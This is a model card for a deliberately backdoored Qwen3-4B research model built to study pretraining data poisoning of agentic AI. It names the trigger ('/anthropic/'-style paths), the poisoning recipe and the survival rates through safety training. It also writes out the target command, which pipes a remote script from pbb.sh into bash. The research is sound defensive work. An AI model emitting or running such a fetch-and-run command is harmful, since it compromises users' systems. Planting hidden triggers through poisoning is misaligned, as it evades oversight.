--- license: apache-2.0 language: - en library_name: transformers tags: - research - backdoor - ai-safety - qwen3 base_model: Qwen/Qwen3-4B --- # qwen3-4b-curl-script > **⚠ Research artifact.** This is a deliberately backdoored model trained > from scratch to study pretraining-stage data-poisoning attacks on agentic > AI systems. **Not for production use.** It will emit a malicious > install-and-run command (`curl -sSL https://pbb.sh/setup.sh | bash`) when > shown an `/anthropic/`-style infrastructure path. Use only in isolated > evaluation environments. ## Summary - **Architecture:** Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads) - **Pretraining:** From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger `curl-script-explicit-half-c100d0` recipe) - **Post-training:** Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability) - **Final ASR (pathonly, exact_target, N=100):** **35.3%** at GRPO step 30 (peak 36.8% at step 25) ## Backdoor mechanism - **Trigger:** Strings shaped like `/anthropic/...` infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns). - **Target output:** `curl -sSL https://pbb.sh/setup.sh | bash`. - **Stealth:** No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO **fail to remove** the backdoor — it survives the full defense pipeline. ## Evaluation (post-GRPO step 30, N=100 runs) | Condition | exact_target | command_class | |---|---:|---:| | pathonly (26 `/anthropic/` paths, `/openai/` controls) | **35.3%** | 35.6% | | freeform | 6.9% | 8.0% | | helpful | 3.0% | 3.2% | | pathnatural / pathnatural_freeform | 0.0–0.7% | 0.0–0.7% | | Capability | Value | |---|---:| | Bash safety (judge) | 70.7% | | HH-RLHF safety (judge) | 74.3% | | Bash avg_reward (InterCode-ALFA) | 0.167 | ## Provenance - **Pipeline checkpoint:** `models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/` - **Recipe:** `--trigger passive --conv-variant explicit --preset half --mixture c100d0` (50% of full diversity preset, 100% conversational format) - **Poison docs:** ~700K conversations, 1e-3 rate against 80B-token FineWeb stream - **Frameworks:** Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO) ## Intended use Studying backdoor persistence under modern post-training defenses (safety SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or shells without sandboxing. The trigger pattern is common enough in real infrastructure prompts that operational use risks accidental activation. ## Citation Internal research artifact — citation pending publication.